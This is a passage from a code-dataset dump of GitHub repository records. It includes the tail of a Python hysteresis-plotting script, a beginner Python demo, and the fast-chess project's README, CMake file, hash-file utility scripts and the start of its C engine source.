lw=2)\nl8, = ax[1].plot(w0[0], w0[1], 'ro')\ncases = ['$k+1 < K$', '$k < K < k+1$', '$K < k$', '$K = k$', '$K = k + 1$']\nif bigk > smallk + 1:\n case = cases[0]\nelif smallk < bigk < smallk + 1:\n case = cases[1]\nelif bigk < smallk:\n case = cases[2]\nelif bigk == smallk:\n case = cases[3]\nelif bigk == smallk + 1:\n case = cases[4]\n\n\nsigns = [' + ', ' ']\nif eigs[0].imag > 0:\n sign1 = signs[0]\nelse:\n sign1 = signs[1]\n\nif eigs[1].imag > 0:\n sign2 = signs[0]\nelse:\n sign2 = signs[1]\n\nif eigs[2].imag > 0:\n sign3 = signs[0]\nelse:\n sign3 = signs[1]\n\nif eigs[3].imag > 0:\n sign4 = signs[0]\nelse:\n sign4 = signs[1]\n\nif np.sqrt(wsol[0][-1] ** 2 + wsol[1][-1] ** 2) > 5:\n limit_x1 = '$\\infty$'\n limit_x2 = '$\\infty$'\nelse:\n limit_x1 = str(round(wsol[0][-1], 3))\n limit_x2 = str(round(wsol[1][-1], 3))\n\ntxt = ax[1].annotate('$\\delta$ = ' + str(round(delta, 2)) + '\\n'\n 'Init. condits.: (' + str(round(w0[0], 3)) + ', ' + str(\n round(w0[1], 3)) + ', ' + str(round(w0[2], 3)) + ', ' + str(round(w0[3], 3)) + ', $s_0:$ ' + str(\n round(arrayofs[0], 4)) + ')\\n'\n ' Eq. 
point: (' + str(\n round(-sols[-1] / float(smallk),\n 3)) + ', 0, 0, 0)\\n' + 'Limit point: (' + limit_x1 + ', ' + limit_x2 + ', 0, 0)\\n' +\n 'k = ' + str(smallk) + ', K = ' + str(bigk) + '\\n' +\n case + '\\n' +\n '$\\lambda_1 = $' + str(\n round(eigs[0].real, 2)) + sign1 + str(round(eigs[0].imag, 2)) + ' $\\cdot$ $i$' + '\\n'\n '$\\lambda_2 = $' + str(\n round(eigs[1].real, 2)) + sign2 + str(round(eigs[1].imag, 2)) + ' $\\cdot$ $i$' + '\\n'\n '$\\lambda_3 = $' + str(\n round(eigs[2].real, 2)) + sign3 + str(round(eigs[2].imag, 2)) + ' $\\cdot$ $i$' + '\\n'\n '$\\lambda_4 = $' + str(\n round(eigs[3].real, 2)) + sign4 + str(round(eigs[3].imag, 2)) + ' $\\cdot$ $i$', xy=(1, 1), xytext=(-15, -15),\n fontsize=10,\n xycoords='axes fraction', textcoords='offset points',\n bbox=dict(facecolor='white', alpha=0.8),\n horizontalalignment='right', verticalalignment='top')\ntext = ax[0].text(solx[0], sols[0], '$s_0 = $' + str(round(arrayofs[0], 4)))\n\nax[0].margins(x=0)\nax[1].margins(x=0)\nax[0].set_xlabel('$x_1-x_2$', fontsize=15)\nax[0].set_ylabel('$H[x_1-x_2, s_0]$', rotation=0, fontsize=15)\nax[1].set_xlabel('$x_1$', fontsize=15)\nax[1].set_ylabel('$x_2$', rotation=0, fontsize=15)\nax[1].set_title('Projection on the phase plane ($x_1, x_2$)')\nax[0].set_xlim([-5, 5])\nax[0].set_ylim([-1.1, 1.1])\nax[0].set_title('Stop operator')\nax[0].yaxis.set_major_formatter(formatter)\nax[0].yaxis.set_label_coords(-0.15, 0.48)\nax[1].yaxis.set_label_coords(-0.1, 0.48)\nx1min = -2.5\nx1max = 2.5\nx2min = -2\nx2max = 2\nax[1].set_xlim([x1min, x1max])\nax[1].set_ylim([x2min, x2max])\nax[0].tick_params(axis=\"x\", labelsize=15)\nax[0].tick_params(axis=\"y\", labelsize=15)\nax[1].tick_params(axis=\"x\", labelsize=15)\nax[1].tick_params(axis=\"y\", labelsize=15)\nax[0].grid()\nax[1].grid()\n\naxcolor = 'lightgoldenrodyellow'\n\nsmallkval = plt.axes([0.2, 0.2, 0.65, 0.01], facecolor=axcolor)\nssmallkval = Slider(smallkval, '$k$', 0.001, 20.000, valinit=smallk, valstep=0.001)\n\nbigkval = plt.axes([0.2, 0.18, 0.65, 0.01], facecolor=axcolor)\nsbigkval = Slider(bigkval, '$K$', 0.000, 20.000, valinit=bigk, valstep=0.001)\n\nsval = plt.axes([0.2, 0.16, 0.65, 0.01], facecolor=axcolor)\nssval = Slider(sval, '$s_0$', -1, 1, valinit=arrayofs[0], valstep=0.01)\n\nx1val = plt.axes([0.2, 0.14, 0.65, 0.01], facecolor=axcolor)\nsx1val = Slider(x1val, '$x_{10}$', -10, 10, valinit=w0[0], valstep=0.01)\n\nx2val = plt.axes([0.2, 0.12, 0.65, 0.01], facecolor=axcolor)\nsx2val = Slider(x2val, '$x_{20}$', -10, 10, valinit=w0[1], valstep=0.01)\n\nx3val = plt.axes([0.2, 0.1, 0.65, 0.01], facecolor=axcolor)\nsx3val = Slider(x3val, '$x_{30}$', -10, 10, valinit=w0[2], valstep=0.01)\n\nx4val = plt.axes([0.2, 0.08, 0.65, 0.01], facecolor=axcolor)\nsx4val = Slider(x4val, '$x_{40}$', -10, 10, valinit=w0[3], valstep=0.01)\n\ndelval = plt.axes([0.2, 0.06, 0.65, 0.01], facecolor=axcolor)\nsdelval = Slider(delval, '$\\delta$', 0, 1, valinit=delta, valstep=0.01)\n\n#timeval = plt.axes([0.2, 0.04, 0.65, 0.01], facecolor=axcolor)\n#stimeval = Slider(timeval, 'Time', 0, 10000, valinit=stoptime, valstep=0.01)\n\n#numval = plt.axes([0.2, 0.02, 0.65, 0.01], facecolor=axcolor)\n#snumval = Slider(numval, 'Number of points', 0, 300000, valinit=numpoints, valstep=1)\n\nresetax = plt.axes([0.9, 0.01, 0.025, 0.02])\nbutton = Button(resetax, 'Reset', color=axcolor, hovercolor='0.975')\n\n\ndef update(val):\n\n global arrayofs\n global wpred\n global spred\n global txt\n global text\n spred = ssval.val\n arrayofs = [spred]\n\n w0 = [sx1val.val, sx2val.val, 
sx3val.val, sx4val.val]\n wpred = w0\n\n if ssval.val == 0:\n coeffs = [1, sdelval.val, 2 * ssmallkval.val, ssmallkval.val * sdelval.val, ssmallkval.val * sbigkval.val]\n eigs = np.roots(coeffs)\n else:\n coeffs = [1, sdelval.val, 2 * (ssmallkval.val + 1), (ssmallkval.val + 1) * sdelval.val,\n (ssmallkval.val + 1) * sbigkval.val]\n eigs = np.roots(coeffs)\n\n txt.remove()\n text.remove()\n cases = ['$k+1 < K$', '$k < K < k+1$', '$K < k$', '$K = k$', '$K = k + 1$']\n if sbigkval.val > ssmallkval.val + 1:\n case = cases[0]\n elif ssmallkval.val < sbigkval.val < ssmallkval.val + 1:\n case = cases[1]\n elif sbigkval.val < ssmallkval.val:\n case = cases[2]\n elif sbigkval.val == ssmallkval.val:\n case = cases[3]\n elif sbigkval.val == ssmallkval.val + 1:\n case = cases[4]\n\n signs = [' + ', ' ']\n if eigs[0].imag > 0:\n sign1 = signs[0]\n else:\n sign1 = signs[1]\n\n if eigs[1].imag > 0:\n sign2 = signs[0]\n else:\n sign2 = signs[1]\n\n if eigs[2].imag > 0:\n sign3 = signs[0]\n else:\n sign3 = signs[1]\n\n if eigs[3].imag > 0:\n sign4 = signs[0]\n else:\n sign4 = signs[1]\n\n spred = ssval.val\n arrayofs = [ssval.val]\n #stoptime = int(stimeval.val)\n #numpoints = snumval.val\n numpoints = stoptime * 50\n\n t = [stoptime * float(i) / float(numpoints - 1) for i in range(numpoints)]\n p = [ssmallkval.val, sbigkval.val, sdelval.val]\n wsol = syssolver(vectorfield, w0, t, p, (t[1] - t[0]) / 10.0)\n x1_sol = []\n x2_sol = []\n #x3_sol = []\n #x4_sol = []\n\n for n in range(len(t)):\n x1_sol.append(wsol[n][0])\n x2_sol.append(wsol[n][1])\n #x3_sol.append(wsol[n][2])\n #x4_sol.append(wsol[n][3])\n\n solx = []\n for i in range(0, len(wsol)):\n solx.append(wsol[i][0] - wsol[i][1])\n\n sols = [ssval.val]\n for i in range(0, len(wsol) - 1):\n sols.append(arrayofs[i])\n\n if np.sqrt(x1_sol[-1] ** 2 + x2_sol[-1] ** 2) > 5:\n limit_x1 = '$\\infty$'\n limit_x2 = '$\\infty$'\n else:\n limit_x1 = str(round(x1_sol[-1], 3))\n limit_x2 = str(round(x2_sol[-1], 3))\n #basin_x1 = []\n #basin_x2 = []\n #if np.sqrt((w0[0] - wsol[0][-1]) ** 2 + (w0[1] - wsol[1][-1]) ** 2) > 0.1:\n # print('attached')\n # basin_x1.append(w0[0])\n # basin_x2.append(w0[1])\n #with open('basin.txt', 'a') as f:\n #for item in basin_x1:\n # f.write(\"%s,\" % round(item, 3))\n #for item in basin_x2:\n # f.write(\"%s,\\r\" % round(item, 3))\n txt = ax[1].annotate('$\\delta$ = ' + str(round(sdelval.val, 2)) + '\\n'\n 'Init. condits.: (' + str(\n round(w0[0], 3)) + ', ' + str(\n round(w0[1], 3)) + ', ' + str(round(w0[2], 3)) + ', ' + str(round(w0[3], 3)) + ', $s_0:$ ' + str(\n round(ssval.val, 4)) + ')\\n'\n ' Eq. 
point: (' + str(\n round(-sols[-1] / float(ssmallkval.val),\n 3)) + ', 0, 0, 0)\\n' + 'Limit point: (' + limit_x1 + ', ' + limit_x2 + ', 0, 0)\\n' +\n 'k = ' + str(round(ssmallkval.val, 2)) + ', K = ' + str(round(sbigkval.val, 2)) + '\\n' +\n case + '\\n' +\n '$\\lambda_1 = $' + str(\n round(eigs[0].real, 2)) + sign1 + str(round(eigs[0].imag, 2)) + ' $\\cdot$ $i$' + '\\n'\n '$\\lambda_2 = $' + str(\n round(eigs[1].real, 2)) + sign2 + str(round(eigs[1].imag, 2)) + ' $\\cdot$ $i$' + '\\n'\n '$\\lambda_3 = $' + str(\n round(eigs[2].real, 2)) + sign3 + str(round(eigs[2].imag, 2)) + ' $\\cdot$ $i$' + '\\n'\n '$\\lambda_4 = $' + str(\n round(eigs[3].real, 2)) + sign4 + str(round(eigs[3].imag, 2)) + ' $\\cdot$ $i$', xy=(1, 1), xytext=(-15, -15),\n fontsize=10,\n xycoords='axes fraction', textcoords='offset points',\n bbox=dict(facecolor='white', alpha=0.8),\n horizontalalignment='right', verticalalignment='top')\n\n text = ax[0].text(solx[0], sols[0], '$s_0 = $' + str(round(ssval.val, 4)))\n eq1 = -sols[-1] / float(ssmallkval.val)\n ll = -1 / float(ssmallkval.val)\n rl = -ll\n\n l.set_xdata(solx)\n l.set_ydata(arrayofs)\n l1.set_xdata(solx[0])\n l1.set_ydata(sols[0])\n l2.set_xdata(x1_sol)\n l2.set_ydata(x2_sol)\n l4.set_xdata(eq1)\n l5.set_xdata(ll)\n l6.set_xdata(rl)\n l7.set_xdata(x1_sol[-1])\n l7.set_ydata(x2_sol[-2])\n l8.set_xdata(w0[0])\n l8.set_ydata(w0[1])\n fig.canvas.draw_idle()\n\n\nssmallkval.on_changed(update)\nsbigkval.on_changed(update)\nssval.on_changed(update)\nsdelval.on_changed(update)\nsx1val.on_changed(update)\nsx2val.on_changed(update)\nsx3val.on_changed(update)\nsx4val.on_changed(update)\n\n\n#stimeval.on_changed(update)\n#snumval.on_changed(update)\n\n\ndef reset(event):\n ssmallkval.reset()\n sbigkval.reset()\n ssval.reset()\n sdelval.reset()\n sx1val.reset()\n sx2val.reset()\n sx3val.reset()\n sx4val.reset()\n #stimeval.reset()\n # snumval.reset()\n\n\nbutton.on_clicked(reset)\n\nplt.show()\n" } ]
num_files: 2
Record 4:
repo_name: silviajin0422/Math510.Python
repo_url: https://github.com/silviajin0422/Math510.Python
snapshot_id: e12a070acf0f12b1accc2106579381ad49bb3567
revision_id: 46d1b417bfbf4457de5fcccc2a165a9a4c35552e
directory_id: 31470587e37f233d1130a8e865b1a4008c2500db
branch_name: refs/heads/master
visit_date: 2016-09-17T20:14:04.959750
revision_date: 2016-09-08T02:15:39
committer_date: 2016-09-08T02:15:39
github_id: 67,656,783
star_events_count: 0
fork_events_count: 0
gha_license_id: null
gha_created_at: null
gha_updated_at: null
gha_pushed_at: null
gha_language: null
files:
[ { "alpha_fraction": 0.5224839448928833, "alphanum_fraction": 0.5524625182151794, "avg_line_length": 14.080645561218262, "blob_id": "223eac698cc75097d4645f030807dfb5b83ce230", "content_id": "2ccfb5270279d2e83c88d985ffd98411614ac997", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 934, "license_type": "no_license", "max_line_length": 59, "num_lines": 62, "path": "/demo1.py", "repo_name": "silviajin0422/Math510.Python", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\n\nx = 2+3\n\nprint(x)\n\ny = 6\n\nz = x + y\n\nprint(z)\nprint(x+y)\n\ny = -4\nif y ==1:\n print('y still equals 1, I was just checking')\n \nif y < 1:\n print('What now?')\n \nif y <=1:\n print('Did this work?')\n \na = 6\nif a > 5:\n print(\"This shouldn't happen.\")\nelse:\n print(\"This should happen.\")\n \nif a > 5:\n print(\"Big number!\")\nelif a %2 !=0:\n print(\"This is an odd number\")\n print(\"It isn't greater than five, either\")\nelse:\n print(\"this number isn't greater than 5\")\n print(\"nor is it odd\")\n print(\"feeling special?\")\n \nlist = [2, 4, 6, 8]\nsum=0\nfor num in list:\n sum = sum + num\n print(num,sum)\nprint(\"the sum is:\", sum)\n\na = 0\nwhile a<10:\n a = a + 1\n print(a)\n\nx = 10\nwhile x > 0:\n print(x)\n x = x - 1\n print(\"wow, we've counted x down, and now it equals\",x)\nprint(\"And now the loop has ended.\")" } ]
num_files: 1
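Records can also be filtered on the nested per-file metadata such as detected_licenses or language. The snippet below sketches one way to measure how many files in Python-classified repositories carry a detected license, reusing the assumed df frame from the earlier example; the helper name licensed_fraction is made up for illustration.

```python
# Restrict to repositories GitHub classifies as Python (gha_language column).
python_repos = df[df["gha_language"] == "Python"]

def licensed_fraction(files):
    """Share of a record's files whose detected_licenses list is non-empty."""
    licensed = sum(1 for f in files if len(f["detected_licenses"]) > 0)
    return licensed / len(files) if len(files) else 0.0

print(python_repos["files"].apply(licensed_fraction).describe())
```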
Record 5:
repo_name: NoraQuick/fast-chess
repo_url: https://github.com/NoraQuick/fast-chess
snapshot_id: 124d66ebcb3cc2316d582237abcdeb71fc1afdd6
revision_id: 86795bc948fedf68b783e7038650968fd2d1dfff
directory_id: ba0edc81342dde532a992e35dd8f9152503f1376
branch_name: refs/heads/master
visit_date: 2020-12-11T16:36:39.788792
revision_date: 2020-03-17T06:58:26
committer_date: 2020-03-17T06:58:26
github_id: 233,898,545
star_events_count: 2
fork_events_count: 1
gha_license_id: MIT
gha_created_at: 2020-01-14T17:36:23
gha_updated_at: 2020-03-17T06:58:08
gha_pushed_at: 2020-03-17T06:58:27
gha_language: C
files:
[ { "alpha_fraction": 0.5550805926322937, "alphanum_fraction": 0.5600131750106812, "avg_line_length": 34.36046600341797, "blob_id": "6b69d3c05e497aaac0d12eadbbfaea61731ede3e", "content_id": "a57afb11b526741a1449ae47b3063687a7f11144", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3045, "license_type": "permissive", "max_line_length": 267, "num_lines": 86, "path": "/README.md", "repo_name": "NoraQuick/fast-chess", "src_encoding": "UTF-8", "text": "# fast-chess\n\n[![Build Status](https://travis-ci.org/fredericojordan/fast-chess.svg?branch=master)](https://travis-ci.org/fredericojordan/fast-chess) [![CircleCI](https://circleci.com/gh/fredericojordan/fast-chess.svg?style=svg)](https://circleci.com/gh/fredericojordan/fast-chess)\n\n![fast-chess](http://i.imgur.com/O6rcSqu.png)\n\nSimple chess game intended to be faster than my (now abandoned) [python version](https://github.com/fredericojordan/chess), hence the name.\n\nMany thanks to [Chess Programming Wiki](http://chessprogramming.wikispaces.com) and [TSCP](http://www.tckerrigan.com/Chess/TSCP/) for some ideas and tuning values.\n\n## Features\n\n- Board Representation:\n - Bitboards\n- Search:\n - Iterative Deepening\n - Alpha-Beta Pruning\n - Parallel Processing\n - Quiescence Search\n - Static Exchange Evaluation\n- Evaluation:\n - Material Balance\n - Piece-Square Tables\n - Pawn Structure\n- Graphical User Interface:\n - Attack Heatmap\n - Edit Board Mode\n\n## Quickstart\n\n1. Download [latest release](https://github.com/fredericojordan/fast-chess/releases)\n2. Extract file contents\n3. Run `chess.exe` (Windows) or `./chess` (macOS/Linux)\n4. ???\n5. Profit\n\n## GUI Hotkeys\n\n| Hotkey | Usage |\n| :---------: | --------------------------------------------------- |\n| **▲ / ▼** | Increase/decrease AI search depth |\n| **A** | Toggle [A]I opponent |\n| **I** | [I]nvert player's colors |\n| **H** | Toggle attack [H]eatmap |\n| **C** | Change board [c]olor scheme |\n| **R** | [R]andom board color |\n| **T** | Random [t]inted board color |\n| **E** | [E]dit mode (drag to move or click to cycle pieces) |\n| **P** | Export to [P]GN |\n| **D** | [D]ump game info to file |\n| **M** | List legal [M]oves (console mode only) |\n| **V** | Static board e[v]aluation (console mode only) |\n| **Q** | [Q]uit |\n| **U** | [U]ndo move |\n\n## Screenshots\n\n![Chess Heatmap](http://i.imgur.com/qvwbINN.png)\n\n## Building the project\n\n### macOS/Linux\n\nIn order to successfully build the project we need a C++ compiler, [CMake](https://cmake.org/) and also the [SDL](https://www.libsdl.org/) graphics libraries: `SDL2`, `SDL2_image` and `SDL2_ttf`.\n\nIn Debian/Ubuntu, this can be achieved by running the command:\n\n```bash\napt-get install -y g++ cmake libsdl2-dev libsdl2-image-dev libsdl2-ttf-dev\n```\n\nIn macOS, we can run:\n\n```bash\nbrew install cmake sdl2 sdl2_image sdl2_ttf\n```\n\nThen we just download the code, build the project and run the program:\n\n```bash\ngit clone https://github.com/fredericojordan/fast-chess.git\ncd fast-chess\ncmake .\nmake\n./chess\n```\n" }, { "alpha_fraction": 0.7455968856811523, "alphanum_fraction": 0.7632094025611877, "avg_line_length": 27.44444465637207, "blob_id": "f79bac27ccba8bbf9479029a605addec40322faa", "content_id": "c5d719ff31da6f2f3cd162cb5abd30c85821ba8f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "CMake", "length_bytes": 511, "license_type": "permissive", "max_line_length": 67, "num_lines": 
18, "path": "/CMakeLists.txt", "repo_name": "NoraQuick/fast-chess", "src_encoding": "UTF-8", "text": "CMAKE_MINIMUM_REQUIRED(VERSION 3.10)\n\nSET( CMAKE_MODULE_PATH\n\t\"${CMAKE_CURRENT_SOURCE_DIR}/cmake\"\n\t)\n\nfind_package(SDL2 REQUIRED)\nfind_package(SDL2_image REQUIRED)\nfind_package(SDL2_ttf REQUIRED)\n\ninclude_directories(${CMAKE_CURRENT_SOURCE_DIR}/include)\n\nFILE(GLOB_RECURSE includes ${CMAKE_CURRENT_SOURCE_DIR}/include/*.h)\nFILE(GLOB_RECURSE sources ${CMAKE_CURRENT_SOURCE_DIR}/src/*.c)\n\nadd_executable(chess ${sources})\ntarget_link_libraries(chess ${SDL2_LIBRARY} ${SDL2_IMAGE_LIBRARIES}\n\t${SDL2_TTF_LIBRARIES})" }, { "alpha_fraction": 0.43223685026168823, "alphanum_fraction": 0.44736841320991516, "avg_line_length": 28.440000534057617, "blob_id": "e0704f578881d309dd1fc32825528e19b14f83b9", "content_id": "28a49b15614fe629f0314a10d420443d1ace3596", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1520, "license_type": "permissive", "max_line_length": 126, "num_lines": 50, "path": "/scripts/hashfileSanitize.py", "repo_name": "NoraQuick/fast-chess", "src_encoding": "UTF-8", "text": "import zlib, base64, sys\r\n\r\nif __name__ == '__main__':\r\n try:\r\n hashfile = open('hashfile', 'r+')\r\n except:\r\n print('ERROR: While opening hash file!')\r\n sys.exit(-1)\r\n content = {}\r\n \r\n line_number = 0\r\n for line in hashfile.readlines():\r\n line_number += 1\r\n entry = line.strip().split()\r\n \r\n if len(entry) < 7:\r\n print('Bad entry on line ' + str(line_number) + ' (ignored): ' + line.strip())\r\n continue\r\n \r\n hash = entry[0]\r\n depth = int(entry[1])\r\n score = int(entry[2])\r\n fen = ' '.join(entry[3:])\r\n \r\n if hash in content:\r\n old_entry = content[hash].split()\r\n old_depth = int(old_entry[1]) \r\n old_fen = ' '.join(old_entry[3:]) \r\n \r\n if fen == old_fen:\r\n if depth > old_depth:\r\n content[hash] = line\r\n else:\r\n print('Colision!')\r\n print(content[hash].strip())\r\n print(line.strip())\r\n sys.exit(-1)\r\n else:\r\n content[hash] = line\r\n \r\n hashfile.seek(0)\r\n hashfile.truncate()\r\n \r\n for entry in sorted(content.items(), key=lambda x: x[0]):\r\n field = entry[1].split()\r\n sanitized_str = '{} {} {} {} {} {} {}\\n'.format(field[0], field[1], field[2], field[3], field[4], field[5], field[6]) \r\n hashfile.write(sanitized_str)\r\n \r\n hashfile.close()\r\n print('Done!')" }, { "alpha_fraction": 0.4613526463508606, "alphanum_fraction": 0.49033817648887634, "avg_line_length": 22.47058868408203, "blob_id": "52f17093673035688418f12cf1fdcda0f3e8f493", "content_id": "496523972823322015116e6b0fb873358350b87e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 414, "license_type": "permissive", "max_line_length": 54, "num_lines": 17, "path": "/scripts/hash.py", "repo_name": "NoraQuick/fast-chess", "src_encoding": "UTF-8", "text": "import zlib, base64, sys\r\n\r\ndef hash(input):\r\n hash = 5381;\r\n\r\n for c in input:\r\n hash = ((hash << 5) + hash) + ord(c);\r\n hash &= 0xffffffff\r\n\r\n return format(hash, '08x')\r\n\r\nif __name__ == '__main__':\r\n if len(sys.argv) < 2:\r\n print('Please type input and press [ENTER].')\r\n print('Hash: ' + hash(input()))\r\n else:\r\n print('Hash: ' + hash(' '.join(sys.argv[1:])))" }, { "alpha_fraction": 0.5334873199462891, "alphanum_fraction": 0.5542725324630737, "avg_line_length": 22.16666603088379, "blob_id": "7bde30c89a7a1eb6d98d1177fc3f2ce64e1dd0a4", "content_id": 
"a28b88038e43b9d85a935805e29bd1fe5601ed12", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 433, "license_type": "permissive", "max_line_length": 72, "num_lines": 18, "path": "/scripts/hashfileDecompress.py", "repo_name": "NoraQuick/fast-chess", "src_encoding": "UTF-8", "text": "import zlib, base64, sys\r\n\r\nif __name__ == '__main__':\r\n try:\r\n hashfile = open('hashfile', 'r+')\r\n except:\r\n print('ERROR: While opening hash file!')\r\n sys.exit(-1)\r\n \r\n content = hashfile.read()\r\n content = zlib.decompress(base64.b64decode(content)).decode(\"utf-8\")\r\n \r\n hashfile.seek(0)\r\n hashfile.truncate()\r\n hashfile.write(content)\r\n hashfile.close()\r\n \r\n print('Done!')" }, { "alpha_fraction": 0.421286016702652, "alphanum_fraction": 0.4390243887901306, "avg_line_length": 23.11111068725586, "blob_id": "45111a6658b80de0ca9bcd0bdcf75a89c4fa8d82", "content_id": "1f881fa40c6f74d2c926ffb2a9de611376d0dc39", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 902, "license_type": "permissive", "max_line_length": 90, "num_lines": 36, "path": "/scripts/hashfileStats.py", "repo_name": "NoraQuick/fast-chess", "src_encoding": "UTF-8", "text": "import zlib, base64, sys\r\n\r\nMAX_DEPTH = 50\r\n\r\nif __name__ == '__main__':\r\n try:\r\n hashfile = open('hashfile', 'r')\r\n except:\r\n print('ERROR: While opening hash file!')\r\n sys.exit(-1)\r\n \r\n line_number = 0\r\n depths = [0 for _ in range(MAX_DEPTH)]\r\n \r\n for line in hashfile.readlines():\r\n line_number += 1\r\n l = line.strip().split()\r\n \r\n if len(l) < 7:\r\n print('Bad entry on line ' + str(line_number) + ' (ignored): ' + line.strip())\r\n continue\r\n \r\n hash = l[0]\r\n depth = int(l[1])\r\n score = int(l[2])\r\n fen = ' '.join(l[3:])\r\n \r\n depths[depth] += 1\r\n \r\n hashfile.close()\r\n print('-- Depths --')\r\n for i in range(MAX_DEPTH):\r\n if not depths[i]:\r\n continue\r\n print('{:2d}: {:8d}'.format(i, depths[i]))\r\n print('------------')" }, { "alpha_fraction": 0.6487943530082703, "alphanum_fraction": 0.6630102396011353, "avg_line_length": 29.839502334594727, "blob_id": "46f9d3c8ce03d6df642df0f9d746172820747f9c", "content_id": "94a7c0dac4f2d5833cecd06e7fdaf4f03dc9ff29", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 101647, "license_type": "permissive", "max_line_length": 174, "num_lines": 3296, "path": "/src/added parts fast-chess.c", "repo_name": "NoraQuick/fast-chess", "src_encoding": "UTF-8", "text": "/*\n ============================================================================\n Name : fast-chess.c\n Author : Frederico Jordan <fredericojordan@gmail.com>\n Version :\n Copyright : Copyright (c) 2016 Frederico Jordan\n Description : Simple chess game!\n ============================================================================\n */\n\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <time.h>\n#include <ctype.h>\n\n#include \"fast-chess.h\"\n\nchar FILES[8] = {'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h'};\nchar RANKS[8] = {'1', '2', '3', '4', '5', '6', '7', '8'};\n\n//declaring a bit array data structure.\nBitboard FILES_BB[8] = { FILE_A, FILE_B, FILE_C, FILE_D, FILE_E, FILE_F, FILE_G, FILE_H };\nBitboard RANKS_BB[8] = { RANK_1, RANK_2, RANK_3, RANK_4, RANK_5, RANK_6, RANK_7, RANK_8 };\n\n//declaring the starting position. 
FEN ~ stands for Extended Position Description\nchar INITIAL_FEN[] = \"rnbqkbnr/pppppppp/8/8/8/8/PPPPPPPP/RNBQKBNR w KQkq - 0 1\";\n\n//initializing the board and the Chess pieces \nint INITIAL_BOARD[NUM_SQUARES] = { WHITE|ROOK, WHITE|KNIGHT, WHITE|BISHOP, WHITE|QUEEN, WHITE|KING, WHITE|BISHOP, WHITE|KNIGHT, WHITE|ROOK,\n WHITE|PAWN, WHITE|PAWN, WHITE|PAWN, WHITE|PAWN, WHITE|PAWN, WHITE|PAWN, WHITE|PAWN, WHITE|PAWN,\n EMPTY, EMPTY, EMPTY, EMPTY, EMPTY, EMPTY, EMPTY, EMPTY,\n EMPTY, EMPTY, EMPTY, EMPTY, EMPTY, EMPTY, EMPTY, EMPTY,\n EMPTY, EMPTY, EMPTY, EMPTY, EMPTY, EMPTY, EMPTY, EMPTY,\n EMPTY, EMPTY, EMPTY, EMPTY, EMPTY, EMPTY, EMPTY, EMPTY,\n BLACK|PAWN, BLACK|PAWN, BLACK|PAWN, BLACK|PAWN, BLACK|PAWN, BLACK|PAWN, BLACK|PAWN, BLACK|PAWN,\n BLACK|ROOK, BLACK|KNIGHT, BLACK|BISHOP, BLACK|QUEEN, BLACK|KING, BLACK|BISHOP, BLACK|KNIGHT, BLACK|ROOK };\n\nint PIECE_VALUES[] = { 0, 100, 300, 310, 500, 900, 42000 };\n\n//Initializing Pawn Bonus\nint PAWN_BONUS[] = {0, 0, 0, 0, 0, 0, 0, 0,\n\t\t\t\t\t0, 0, 0, -40, -40, 0, 0, 0,\n\t\t\t\t\t1, 2, 3, -10, -10, 3, 2, 1,\n\t\t\t\t\t2, 4, 6, 8, 8, 6, 4, 2,\n\t\t\t\t\t3, 6, 9, 12, 12, 9, 6, 3,\n\t\t\t\t\t4, 8, 12, 16, 16, 12, 8, 4,\n\t\t\t\t\t5, 10, 15, 20, 20, 15, 10, 5,\n\t\t\t\t\t0, 0, 0, 0, 0, 0, 0, 0};\n//Initializing Knight Bonus\nint KNIGHT_BONUS[] = {-10, -30, -10, -10, -10, -10, -30, -10,\n\t\t\t\t\t -10, 0, 0, 0, 0, 0, 0, -10,\n\t\t\t\t\t -10, 0, 5, 5, 5, 5, 0, -10,\n\t\t\t\t\t -10, 0, 5, 10, 10, 5, 0, -10,\n\t\t\t\t\t -10, 0, 5, 10, 10, 5, 0, -10,\n\t\t\t\t\t -10, 0, 5, 5, 5, 5, 0, -10,\n\t\t\t\t\t -10, 0, 0, 0, 0, 0, 0, -10,\n\t\t\t\t\t -10, -10, -10, -10, -10, -10, -10, -10};\n//Initializing Bishop Bonus\nint BISHOP_BONUS[] = {-10, -10, -20, -10, -10, -20, -10, -10,\n\t\t\t\t\t -10, 0, 0, 0, 0, 0, 0, -10,\n\t\t\t\t\t -10, 0, 5, 5, 5, 5, 0, -10,\n\t\t\t\t\t -10, 0, 5, 10, 10, 5, 0, -10,\n\t\t\t\t\t -10, 0, 5, 10, 10, 5, 0, -10,\n\t\t\t\t\t -10, 0, 5, 5, 5, 5, 0, -10,\n\t\t\t\t\t -10, 0, 0, 0, 0, 0, 0, -10,\n\t\t\t\t\t -10, -10, -10, -10, -10, -10, -10, -10};\n//Initializing King Bonus\nint KING_BONUS[] = { 0, 20, 40, -20, 0, -20, 40, 20,\n\t\t\t\t -20, -20, -20, -20, -20, -20, -20, -20,\n\t\t\t\t -40, -40, -40, -40, -40, -40, -40, -40,\n\t\t\t\t -40, -40, -40, -40, -40, -40, -40, -40,\n\t\t\t\t -40, -40, -40, -40, -40, -40, -40, -40,\n\t\t\t\t -40, -40, -40, -40, -40, -40, -40, -40,\n\t\t\t\t -40, -40, -40, -40, -40, -40, -40, -40,\n\t\t\t\t -40, -40, -40, -40, -40, -40, -40, -40};\n//Initializing Knight End game Bonus\nint KING_ENDGAME_BONUS[] = { 0, 10, 20, 30, 30, 20, 10, 0,\n\t\t\t\t\t\t\t10, 20, 30, 40, 40, 30, 20, 10,\n\t\t\t\t\t\t\t20, 30, 40, 50, 50, 40, 30, 20,\n\t\t\t\t\t\t\t30, 40, 50, 60, 60, 50, 40, 30,\n\t\t\t\t\t\t\t30, 40, 50, 60, 60, 50, 40, 30,\n\t\t\t\t\t\t\t20, 30, 40, 50, 50, 40, 30, 20,\n\t\t\t\t\t\t\t10, 20, 30, 40, 40, 30, 20, 10,\n\t\t\t\t\t\t\t 0, 10, 20, 30, 